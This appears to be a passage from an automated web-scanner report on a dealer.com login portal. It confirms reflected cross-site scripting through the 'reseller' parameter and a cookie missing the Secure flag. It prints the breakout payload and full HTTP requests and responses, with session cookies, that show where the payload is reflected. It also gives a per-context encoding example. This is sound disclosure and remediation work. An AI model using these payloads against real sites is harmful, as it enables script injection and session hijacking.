normal; /*color: #ff9900;*/ text-decoration: none; color: #fd6400; } a span, #devLoginLinks a span{ font-weight: normal; /*color: #5983ba;*/ text-decoration: none; color: #000000; } a span, #devLoginLinks a span{ border-bottom: 1px dotted #fd6400; } * html .ieHack{ border-bottom: 1px dotted #fd6400; } #links{ margin-bottom: 10px; margin-right: 10px; } #links td, #links td a, #devLoginLinks a{ font-weight: normal; font-size: 11px; } #ie6Upgrade, #ff2Upgrade{ /*visibility: hidden;*/ display: none; width: 445px; padding-right: 10px; margin-top: 20px; cursor: hand; } #ie6Upgrade td, #ff2Upgrade td{ font-size: 11px; font-weight: normal; } .languageName{ text-transform: capitalize; } .clickable{cursor: pointer;} * html .clickable{cursor: hand;}</style></head><body onLoad="doPageLoad()"><form action="/" method="POST" onSubmit="return doLogin();" id="loginForm"><input type="hidden" name="action" value="Login"><input type="hidden" name="reseller" value="3"><input type="hidden" name="lang" value="3"><table id="loginTable" style="visibility:hidden" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table width="450" border="0" cellpadding="5" cellspacing="0" id="links"> <tr> <td align="center"><a href="javascript:addBookmark()" border="0"><span>Bookmark This Page</span></a></td> <td align="center"><a href="javascript:forgotPassword()" border="0"><span>Forgot Username/Password?</span></a></td> </tr> </table> <div id="loginBox"> <table id="loginFormTable" width="100%" cellspacing="4" cellpadding="2" border="0"> <colgroup> <col style="padding-left:5px"> <col width="80%"> </colgroup> <tr> <td colspan="2"> <div class="instructions">'"--></style></script><script>netsparker(0x000164)</script></div> </td> </tr> <tr> <td nowrap><label for="username">Username:</label></td> <td ><input name="username" style="width: 90%" ></td> </tr> <tr> <td nowrap><label for="password">Password:</label></td> <td><input name="password" type="password" 
style="width: 90%"></td> </tr> <tr> <td colspan="2" align="center" nowrap> <input type="checkbox" name="storeCookie" value="storeCookie"/> <label for="storeCookie">Remember my username and password</label> </td> </tr> <tr> <td colspan="2" align="center"> <input type="submit" value="Login"> </td> </tr> </table> </div> <div id="ie6Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> <div id="ff2Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old version of Firefox which we no longer support.<br/> Starting March 1st, 2009, you will no longer be able to login to ControlCenter with this browser.<br/><br/> <a href="http://www.getfirefox.com" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> </td> </tr></table></form><script src="https://cc1.dealer.com/js/ddc/veneer/util/ext-browser-info-min.js?1302618944000" language="javascript"></script><script src="https://cc3.dealer.com/js/ddc/veneer/ext-login-validation-min.js?1302618944000" language="javascript"></script><style type="text/css" media="screen"> #browserDetectionTable{ visibility: hidden; } #loggedInTable{ position: absolute; top: 0; left: 0; visibility: hidden; }</style><table id="browserDetectionTable" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" valign="top"> 
<br/><br/><br/><br/><br/><br/><br/> We have minimum browser requirements to use our application.<br/><br/> We require Firefox 3.0 & above on Windows or Macintosh.<br/> or Internet Explorer version 7.0 on Windows.<br/> <!--<br/>You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a><br/><br/><br/>--> Please click one of these options download:<br/><br/> <table width="70%"> <tr> <td align="center" class="clickable" style="color: #fd6400;" valign="middle" onclick="location='http://www.mozilla.com/firefox'"> Click to download Firefox 3.0<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'><br/> Click to download Firefox 3.0 </td> <td align="center" class="clickable" valign="middle" style="color: #000099;" onclick="location='http://www.microsoft.com/windows/ie/downloads/default.mspx'"> Click to download IE 7.0<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'><br/> Click to download IE 7.0 </td> </tr> </table> </td> </tr></table><table id="loggedInTable" border="0" width="100%" height="70%"> <tr> <td align="center" valign="center" style="font-family: arial; font-weight: bold"> <span style="color: #880000"> If you have a pop-up blocker installed, it could prevent the login window from appearing.<br/> Please remember to turn off your pop-up blocker for all dealer.com sites. Thank you. 
</span><br/><br/> <img src="https://cc1.dealer.com/images/3/logo.png?0" border='0' height=150><br/> (You are now logged in and may close this window) </td> </tr></table><script type="text/javascript" language="javascript">BrowserInfo.isDev = ("false" == "true");BrowserInfo.embeddedBrowser = ("" == "true");BrowserInfo.isInternal = ("false" == "true");// since this page gets loaded before the main framework, localized strings for JS need to be included this wayLoginValidator.localizedStrings = { "800_X_600_WARNING" : "Your screen resolution is set to 800 x 600.\nAlthough you can use Control Center at this lower resolution, it functions best at a higher resolution, like 1024 x 768."};LoginValidator.validate("","","3","en_US");</script> <script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script> <script type="text/javascript">try{var tracker=_gat._getTracker("UA-248438-3");tracker._initData();tracker._trackPageview()}catch(e){}</script></body> <script language="javascript"> //we need to check for a module hash and preserve that //as well as any query string params //for deep linking into modules var hash = document.location.hash; //we need to reset the form's action //so we include the hash and query params //using get and set Attribute bc there is a form field //named action inside the form....grrrr! 
var oldAction = document.forms[0].attributes["action"].value; document.forms[0].attributes["action"].value = oldAction + hash; var hasSubmitted = false; if( opener && opener.location.href.indexOf("/views/login") == -1 ){ opener.location = "/views/login?reseller=3&lang=en_US" + (hash); window.close(); } if( window != top ) top.location = location.href; function doPageLoad(){ if( BrowserInfo.isIE() && BrowserInfo.version < 7.0){ //document.getElementById("ie6Upgrade").style.visibility = "visible"; document.getElementById("ie6Upgrade").style.display = "block"; } if( BrowserInfo.isFirefox() && BrowserInfo.version < "3."){ //document.getElementById("ff2Upgrade").style.visibility = "visible"; document.getElementById("ff2Upgrade").style.display = "block"; } if( document.getElementById("loginTable").style.display != "none" ) document.forms[0].username.focus(); } function addBookmark(){ var title = "Control Center Login"; //var url = "http://cc.dealer.com/views/login"; var url = location.href; if( document.all ) window.external.AddFavorite( url, title ); else if( window.sidebar ) window.sidebar.addPanel( title, url, ""); } </script></html>
- /views/login

/views/login CONFIRMED

https://cc.dealer.com/views/login?reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..

Parameters

Parameter Type Value
reseller GET '"--></style></script><script>alert(0x000165)</script>

Request

GET /views/login?reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000165)%3C/script%3E HTTP/1.1
Referer: https://cc.dealer.com/views/forgot-password?reseller=&lang=en_US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=b8pucf8ka74jr; ssoid=612f7905404638d30061b29f5bc6c273
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3696
Date: Sun, 17 Apr 2011 02:00:01 GMT
Connection: keep-alive


<html><head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title> Control Center Login</title> <script src="https://cc2.dealer.com/javascript/md5.js?1276795935000" language="javascript"></script> <script language="javascript"> function doLogin() { if(hasSubmitted) return false; theForm = document.forms[0]; var pwEl = theForm.elements["password"]; if( pwEl.value != "" && pwEl.value.length != 32) { pwEl.value=hex_md5(pwEl.value); } // password validation in both ext-user-manager.js (for changing password) and login.vm (for expired passwords) hasSubmitted = true; return true; } function forgotPassword() { var extra = ""; if(document.forms[0].elements["username"].value!="") extra="?_username="+document.forms[0].elements["username"].value+"&reseller='"--></style></script><script>netsparker(0x000165)</script>&lang=en_US"; document.location = "/views/forgot-password"+((extra)?extra:"?reseller='"--></style></script><script>netsparker(0x000165)</script>&lang=en_US"); } </script> <!-- NOTE; Moving to external file doesn't play nice --><style type="text/css" media="screen"> body{ margin:0; padding:0; overflow: hidden; } html, body{ height:100% } td { font: 12px "Lucida Grande",LucidaGrande,verdana,sans-serif; font-weight: bold; } #loginBox { background: url(https://cc3.dealer.com/images/'"--></style></script><script>netsparker(0x000165)</script>/login_graphic.png?0) no-repeat; width: 489px; height: 330px; } * html #loginBox{ padding-top: 105px; padding-left: 0px; } #loginBox table { padding-left: 50px; padding-right: 65px; } #loginBox table{ padding-top: 105px; } * html #loginBox table { width: 400px; padding-left: 0px; margin-left: 20px; margin-right: 35px; } .instructions{ padding: 2px; padding-left: 18px; font-size: 11px; border: 1px solid #ffff77; font-family: arial; font-weight: bold; background: #ffffcc url( https://cc1.dealer.com/assets/icons/small/information.png?1276796052000 ) no-repeat center left; width: 300px; } a, a:hover, a:click, 
#devLoginLinks a, #devLoginLinks a:hover, #devLoginLinks a:click{ font-weight: normal; /*color: #ff9900;*/ color: #fd6400; } a, a:visited, #devLoginLinks a:visited{ font-weight: normal; /*color: #ff9900;*/ text-decoration: none; color: #fd6400; } a span, #devLoginLinks a span{ font-weight: normal; /*color: #5983ba;*/ text-decoration: none; color: #000000; } a span, #devLoginLinks a span{ border-bottom: 1px dotted #fd6400; } * html .ieHack{ border-bottom: 1px dotted #fd6400; } #links{ margin-bottom: 10px; margin-right: 10px; } #links td, #links td a, #devLoginLinks a{ font-weight: normal; font-size: 11px; } #ie6Upgrade, #ff2Upgrade{ /*visibility: hidden;*/ display: none; width: 445px; padding-right: 10px; margin-top: 20px; cursor: hand; } #ie6Upgrade td, #ff2Upgrade td{ font-size: 11px; font-weight: normal; } .languageName{ text-transform: capitalize; } .clickable{cursor: pointer;} * html .clickable{cursor: hand;}</style></head><body onLoad="doPageLoad()"><form action="/" method="POST" onSubmit="return doLogin();" id="loginForm"><input type="hidden" name="action" value="Login"><input type="hidden" name="reseller" value="'"--></style></script><script>netsparker(0x000165)</script>"><input type="hidden" name="lang" value=""><table id="loginTable" style="visibility:hidden" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table width="450" border="0" cellpadding="5" cellspacing="0" id="links"> <tr> <td align="center"><a href="javascript:addBookmark()" border="0"><span>Bookmark This Page</span></a></td> <td align="center"><a href="javascript:forgotPassword()" border="0"><span>Forgot Username/Password?</span></a></td> </tr> </table> <div id="loginBox"> <table id="loginFormTable" width="100%" cellspacing="4" cellpadding="2" border="0"> <colgroup> <col style="padding-left:5px"> <col width="80%"> </colgroup> <tr> <td colspan="2"> </td> </tr> <tr> <td nowrap><label for="username">Username:</label></td> <td ><input name="username" 
style="width: 90%" ></td> </tr> <tr> <td nowrap><label for="password">Password:</label></td> <td><input name="password" type="password" style="width: 90%"></td> </tr> <tr> <td colspan="2" align="center" nowrap> <input type="checkbox" name="storeCookie" value="storeCookie"/> <label for="storeCookie">Remember my username and password</label> </td> </tr> <tr> <td colspan="2" align="center"> <input type="submit" value="Login"> </td> </tr> </table> </div> <div id="ie6Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> <div id="ff2Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old version of Firefox which we no longer support.<br/> Starting March 1st, 2009, you will no longer be able to login to ControlCenter with this browser.<br/><br/> <a href="http://www.getfirefox.com" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> </td> </tr></table></form><script src="https://cc1.dealer.com/js/ddc/veneer/util/ext-browser-info-min.js?1302618944000" language="javascript"></script><script src="https://cc3.dealer.com/js/ddc/veneer/ext-login-validation-min.js?1302618944000" language="javascript"></script><style type="text/css" media="screen"> #browserDetectionTable{ visibility: hidden; } #loggedInTable{ position: absolute; top: 0; left: 0; visibility: hidden; }</style><table 
id="browserDetectionTable" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" valign="top"> <br/><br/><br/><br/><br/><br/><br/> We have minimum browser requirements to use our application.<br/><br/> We require Firefox 3.0 & above on Windows or Macintosh.<br/> or Internet Explorer version 7.0 on Windows.<br/> <!--<br/>You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a><br/><br/><br/>--> Please click one of these options download:<br/><br/> <table width="70%"> <tr> <td align="center" class="clickable" style="color: #fd6400;" valign="middle" onclick="location='http://www.mozilla.com/firefox'"> Click to download Firefox 3.0<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'><br/> Click to download Firefox 3.0 </td> <td align="center" class="clickable" valign="middle" style="color: #000099;" onclick="location='http://www.microsoft.com/windows/ie/downloads/default.mspx'"> Click to download IE 7.0<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'><br/> Click to download IE 7.0 </td> </tr> </table> </td> </tr></table><table id="loggedInTable" border="0" width="100%" height="70%"> <tr> <td align="center" valign="center" style="font-family: arial; font-weight: bold"> <span style="color: #880000"> If you have a pop-up blocker installed, it could prevent the login window from appearing.<br/> Please remember to turn off your pop-up blocker for all dealer.com sites. Thank you. 
</span><br/><br/> <img src="https://cc1.dealer.com/images/'"--></style></script><script>netsparker(0x000165)</script>/logo.png?0" border='0' height=150><br/> (You are now logged in and may close this window) </td> </tr></table><script type="text/javascript" language="javascript">BrowserInfo.isDev = ("false" == "true");BrowserInfo.embeddedBrowser = ("" == "true");BrowserInfo.isInternal = ("false" == "true");// since this page gets loaded before the main framework, localized strings for JS need to be included this wayLoginValidator.localizedStrings = { "800_X_600_WARNING" : "Your screen resolution is set to 800 x 600.\nAlthough you can use Control Center at this lower resolution, it functions best at a higher resolution, like 1024 x 768."};LoginValidator.validate("","","'"--></style></script><script>netsparker(0x000165)</script>","en_US");</script> <script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script> <script type="text/javascript">try{var tracker=_gat._getTracker("UA-248438-3");tracker._initData();tracker._trackPageview()}catch(e){}</script></body> <script language="javascript"> //we need to check for a module hash and preserve that //as well as any query string params //for deep linking into modules var hash = document.location.hash; //we need to reset the form's action //so we include the hash and query params //using get and set Attribute bc there is a form field //named action inside the form....grrrr! 
var oldAction = document.forms[0].attributes["action"].value; document.forms[0].attributes["action"].value = oldAction + hash; var hasSubmitted = false; if( opener && opener.location.href.indexOf("/views/login") == -1 ){ opener.location = "/views/login?reseller='"--></style></script><script>netsparker(0x000165)</script>&lang=en_US" + (hash); window.close(); } if( window != top ) top.location = location.href; function doPageLoad(){ if( BrowserInfo.isIE() && BrowserInfo.version < 7.0){ //document.getElementById("ie6Upgrade").style.visibility = "visible"; document.getElementById("ie6Upgrade").style.display = "block"; } if( BrowserInfo.isFirefox() && BrowserInfo.version < "3."){ //document.getElementById("ff2Upgrade").style.visibility = "visible"; document.getElementById("ff2Upgrade").style.display = "block"; } if( document.getElementById("loginTable").style.display != "none" ) document.forms[0].username.focus(); } function addBookmark(){ var title = "Control Center Login"; //var url = "http://cc.dealer.com/views/login"; var url = location.href; if( document.all ) window.external.AddFavorite( url, title ); else if( window.sidebar ) window.sidebar.addPanel( title, url, ""); } </script></html>
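Why this finding matters more than a single reflected parameter: in the login response above the same reseller value lands in at least five different output contexts (a JavaScript string literal inside <script>, a CSS url() inside <style>, the value attribute of a hidden input, an <img src>, and an argument of LoginValidator.validate), and the scanner's payload is built to close whichever context it lands in. One HTML-entity pass at the output would not fix the <script> and <style> sinks. The following is an added example, not code from this report or from the scanned application: it renders a cut-down template with the same kinds of sinks, once by plain concatenation (what the scan observed) and once with an encoder chosen per context, and checks whether the payload escapes its context. The template text and all function names are illustrative.

```javascript
// Added example (not code from the report or from the scanned application):
// the reseller value is reflected into several output contexts on the login
// page. This renders a cut-down template with the same kinds of sinks, first
// by plain concatenation (what the scan observed) and then with an encoder
// chosen per context. Template text and function names are illustrative.

// Payload from the report, URL-decoded.
const PAYLOAD = '\'"--></style></script><script>netsparker(0x000165)</script>';

// HTML text / quoted-attribute context.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// JavaScript string-literal context: \xHH / \uHHHH for everything that is not
// alphanumeric. '<' and '/' become \x3c and \x2f, so the HTML parser can no
// longer find a "</script>" inside the literal.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Inverse of encodeJsString, used only to show the round trip is lossless.
function decodeJsString(s) {
  return s.replace(/\\x([0-9a-f]{2})|\\u([0-9a-f]{4})/gi,
    (m, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}

// CSS url() context: percent-encode so that ')', quotes, '<' and '/' cannot
// close the url() token or the <style> element. encodeURIComponent leaves
// ( ) ' * unescaped, so those are handled explicitly.
function encodeCssUrlPart(s) {
  return encodeURIComponent(String(s))
    .replace(/[()'*]/g, c => '%' + c.charCodeAt(0).toString(16).toUpperCase());
}

// The sink types seen in the scanned page: a JS string inside <script>, a CSS
// url() inside <style>, a hidden input's value attribute, and an argument of
// a JS function call. `enc` supplies one encoder per context.
function renderLogin(reseller, enc) {
  return [
    '<script>var next = "/views/login?reseller=' + enc.js(reseller) + '&lang=en_US";</script>',
    '<style>#loginBox{background:url(https://cc3.dealer.com/images/' + enc.css(reseller) + '/login_graphic.png)}</style>',
    '<input type="hidden" name="reseller" value="' + enc.attr(reseller) + '">',
    '<script>LoginValidator.validate("", "", "' + enc.js(reseller) + '", "en_US");</script>',
  ].join('\n');
}

const identity = { js: s => s, css: s => s, attr: s => s };
const perContext = { js: encodeJsString, css: encodeCssUrlPart, attr: encodeHtml };

function renderUnsafe(value = PAYLOAD) { return renderLogin(value, identity); }
function renderSafe(value = PAYLOAD) { return renderLogin(value, perContext); }

// Break-out indicator: the template emits exactly two </script> and one
// </style> of its own; any extra closing tag came from the injected value.
function countClosingTags(html, tag) {
  return (html.match(new RegExp('</' + tag + '>', 'gi')) || []).length;
}
function payloadBreaksOut(html) {
  return countClosingTags(html, 'script') > 2 || countClosingTags(html, 'style') > 1;
}

console.log('concatenation breaks out:', payloadBreaksOut(renderUnsafe()));
console.log('per-context encoding breaks out:', payloadBreaksOut(renderSafe()));
```

The point of the per-context encoders is that each one is chosen by where the value is written, not by what the value contains; a template engine that applies only HTML entity encoding would still leave the two <script> sinks and the <style> sink exploitable, because "&lt;/script&gt;" inside a JS string is harmless but an unencoded "</script>" is not.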
- /views/forgot-password

/views/forgot-password CONFIRMED

https://cc.dealer.com/views/forgot-password?reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..

Parameters

Parameter Type Value
reseller GET '"--></style></script><script>alert(0x000166)</script>
lang GET en_US
_state POST submit
username POST Ronald Smith
email POST netsparker@example.com

Request

POST /views/forgot-password?reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000166)%3C/script%3E&lang=en_US HTTP/1.1
Referer: https://cc.dealer.com/views/forgot-password?reseller=&lang=en_US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2650869258.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=b8pucf8ka74jr; ssoid=612fcb8a40463812016995a20dc568e7
Content-Length: 66
Accept-Encoding: gzip, deflate

_state=submit&username=Ronald+Smith&email=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2648
Date: Sun, 17 Apr 2011 02:00:31 GMT
Connection: keep-alive


<html><head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title>Dealer.com Forgot Username/Password</title><style type="text/css"> body{ margin:0; padding:0; overflow: hidden; } html, body{ height:100% } td { font: 12px "Lucida Grande",LucidaGrande,verdana,sans-serif; font-weight: bold; } #loginBox { background: url(https://cc3.dealer.com/images/'"--></style></script><script>netsparker(0x000166)</script>/login_graphic.png?0) no-repeat; width: 489px; height: 330px; } * html #loginBox{ padding-top: 80px; padding-left: 0px; } #loginBox table { padding-left: 50px; padding-right: 65px; } #loginBox table{ padding-top: 88px; } * html #loginBox table { width: 400px; padding-left: 0px; margin-left: 20px; margin-right: 35px; } .instructions{ padding: 2px; padding-left: 18px; font-size: 11px; border: 1px solid #ffff77; font-family: arial; font-weight: bold; background: #ffffcc url( https://cc1.dealer.com/assets/icons/small/information.png?1276796052000 ) no-repeat center left; width: 85%; } a, a:hover, a:click, #devLoginLinks a, #devLoginLinks a:hover, #devLoginLinks a:click{ font-weight: normal; /*color: #ff9900;*/ color: #fd6400; } a, a:visited, #devLoginLinks a:visited{ font-weight: normal; /*color: #ff9900;*/ text-decoration: none; color: #fd6400; } a span, #devLoginLinks a span{ font-weight: normal; /*color: #5983ba;*/ text-decoration: none; color: #000000; } a span, #devLoginLinks a span{ border-bottom: 1px dotted #fd6400; } * html .ieHack{ border-bottom: 1px dotted #fd6400; } #links{ margin-bottom: 10px; margin-right: 10px; } #links td, #links td a, #devLoginLinks a{ font-weight: normal; font-size: 11px; } #fireFoxDiv{ visibility: hidden; width: 445px; padding-right: 10px; margin-top: 20px; cursor: hand; } #fireFoxDiv td{ font-size: 11px; font-weight: normal; } .clickable{cursor: pointer;} * html .clickable{cursor: hand;} .error, .required{ color: #880000; } .requiredField{ background: #FFFDE6; } .errorField{ /*border: 1px solid #cc0000;*/ 
background: #FFD8D3; }</style><script type="text/javascript"> function doSubmit() { if(confirm('Your current password will be reset and a new one will be e-mailed to you. Click OK to continue.')) document.forms[0].submit(); } </script></head><body><form method='POST'><input type='hidden' name='_state' value='submit' class='' > <table id="loginTable" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table width="450" border="0" cellpadding="0" cellspacing="0" id="links"> <tr> <td align="center"><a href="/views/login?reseller='"--></style></script><script>netsparker(0x000166)</script>" border="0"><span>Return to login</span></a></td> </tr> </table> <div id="loginBox"> <table width="100%" cellspacing="4" cellpadding="2" border="0"> <tr> <td colspan="2"> <div class="instructions"> Forgot your username?&nbsp;Contact Support<br> Forgot your password?&nbsp;Submit the form below </div> </td> </tr> <tr> <td width="10%" nowrap><span class='error'>Username:</span>&nbsp;<span class="required">*</span></td> <td><input type='text' name='username' value='Ronald Smith' class='requiredField' style='width:90%'>&nbsp;<img src='/assets/icons/small/pin_red.png' border=0 align='absbottom' tooltip='Incorrect username or email address, please try again.' class='errorPin'></td> </tr> <tr> <td width="10%" nowrap><span class='error'>Email Address:</span>&nbsp;<span class="required">*</span></td> <td><input type='text' name='email' value='netsparker@example.com' class='requiredField' style='width:90%'>&nbsp;<img src='/assets/icons/small/pin_red.png' border=0 align='absbottom' tooltip='Incorrect username or email address, please try again.' 
class='errorPin'></td> </tr> <tr> <td colspan="2" align="center"> <input type="button" value='Get New Password' onClick="doSubmit()"> </td> </tr> </table> </div> <div id="fireFoxDiv" onClick=""> </div> </td> </tr> </table></form> <script src="https://cc2.dealer.com/javascript/prototype.js?1276795935000" language="javascript"></script> <script src="https://cc2.dealer.com/javascript/cssQuery/cssQuery-p.js?1276795935000" language="javascript"></script> <script src="https://cc2.dealer.com/components/tooltips/Tooltips.js?1277393950000" language="javascript"></script> <link href="https://cc1.dealer.com/components/tooltips/tooltips.css?1277393950000" rel="stylesheet" type="text/css" media="all" /><script language="javascript"> Error = { showErrorMessage : function( msg ){ if( document.all ) this.hideSelects(); Tooltips.Initialize( null, "img[tooltip]" ); var pageMask = (opener) ? top.document.createElement( "div" ) : document.createElement( "div" ); pageMask.setAttribute( "id", "pageMask" ); if( opener ) top.document.body.appendChild( pageMask ); else document.body.appendChild( pageMask ); pageMask.style.width = (document.all) ? 
(opener)?top.document.body.scrollWidth:document.body.scrollWidth : (opener)?top.document.body.offsetWidth:document.body.offsetWidth; pageMask.style.height = (document.all)?(opener)?top.document.body.scrollHeight:document.body.scrollHeight:(opener)?(top.document.body.scrollHeight>0)?top.document.body.scrollHeight:top.document.body.offsetHeight:(document.body.scrollHeight>0)?document.body.scrollHeight:document.body.offsetHeight; pageMask.style.visibility = "visible"; var errorDiv = (opener)?top.document.createElement( "div" ):document.createElement( "div" ); errorDiv.setAttribute( "id", "errorMessage" ); if( opener ) top.document.body.appendChild( errorDiv ); else document.body.appendChild( errorDiv ); var errorDivMsg = '<center>\ <img src="/assets/icons/small/stop.png" border=0 align="absmiddle" width="16">&nbsp;<b>There were errors on this page</b>\ &nbsp;<img src="/assets/icons/small/stop.png" border=0 align="absmiddle" width="16"><br><br>'+ ((msg!="")?msg:"")+'Please resolve all errors and try saving again.<br>\ Mouse over the <img src="/assets/icons/small/pin_red.png" border=0 align="absmiddle" width="16"> icons for more information.</br>\ <span style="color: #454545">(click to close this message)</span>\ </center>'; if( opener ) top.$("errorMessage").innerHTML = errorDivMsg; else $("errorMessage").innerHTML = errorDivMsg; Event.observe( errorDiv, "click", Error.hideErrorMessage.bindAsEventListener(Error) ); if( document.all ){ if( opener ) top.$("errorMessage").style.left = (top.document.body.offsetWidth/2) - (top.$("errorMessage").offsetWidth/2); else $("errorMessage").style.left = (document.body.offsetWidth/2) - ($("errorMessage").offsetWidth/2); }else{ if( opener ) top.$("errorMessage").style.left = (top.innerWidth/2) - (top.$("errorMessage").offsetWidth/2); else $("errorMessage").style.left = (innerWidth/2) - ($("errorMessage").offsetWidth/2); } if( opener ) top.$("errorMessage").style.visibility = "visible"; else $("errorMessage").style.visibility = 
"visible"; if( opener ) top.StatusControl.changeStatus(null,false,200); else { try { StatusControl.changeStatus(null,false,200); } catch(e) { try { parent.StatusControl.changeStatus(null,false,200); } catch(e){} } } }, hideErrorMessage : function(){ if(document.all){ if( opener ) top.$("pageMask").removeNode(true); else $("pageMask").removeNode(true); }else{ if( opener ) top.$("pageMask").parentNode.removeChild( top.$("pageMask") ); else $("pageMask").parentNode.removeChild( $("pageMask") ); } if( opener ) top.$("errorMessage").style.visibility = "hidden"; else $("errorMessage").style.visibility = "hidden"; if( document.all ) this.showSelects(); }, hideSelects : function(){ var els = document.getElementsByTagName("select"); var ln = els.length; for( var i=ln; i>0; i-- ) els[ln-i].style.visibility = "hidden"; }, showSelects : function(){ var els = document.getElementsByTagName("select"); var ln = els.length; for( var i=ln; i>0; i-- ) els[ln-i].style.visibility = "visible"; } } // TODO: $errorMsg if you want more info in dialog Error.showErrorMessage( "" );</script></body></html>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A cookie was set over HTTPS without the Secure attribute. Without that attribute the browser will also send the cookie over plain HTTP, so an attacker who can observe the victim's unencrypted traffic, or who holds a man-in-the-middle (MITM) position and can steer the browser to an http:// URL of the site, can capture the cookie without having to break TLS.

Impact

The browser will transmit this cookie over unencrypted HTTP connections as well as over HTTPS. If the cookie is security-relevant (such as a session cookie), an attacker who can observe that traffic can capture it and hijack the victim's session. An attacker in a MITM position does not have to wait for the victim to visit an http:// page: they can force the browser to make a plain-HTTP request to the site, and the cookie is sent along with it. In this scan the application itself triggers such a request: the response shown below sets ssoid for the whole .dealer.com domain and in the same response redirects the browser to an http://cc.dealer.com/... URL, so the freshly issued cookie goes out in clear text on the very next request.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If a cookie is not related to authentication and does not carry any personal information, it does not have to be marked as secure.)

Remedy

Mark all cookies used within the application as secure, and make sure the application never redirects a browser to an http:// URL of its own, since such a redirect is exactly what forces the cookie onto a plain-text connection.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to observe or redirect the victim's traffic. This generally requires a position on the victim's network or on the path to the web server: the ability to carry out layer 2 attacks on a shared network segment, physical access to a system that the traffic passes through, or prior compromise of a system between the victim and the web server.
- /views/

/views/ CONFIRMED

https://cc.dealer.com/views/

Identified Cookie

ssoid

Request

GET /views/ HTTP/1.1
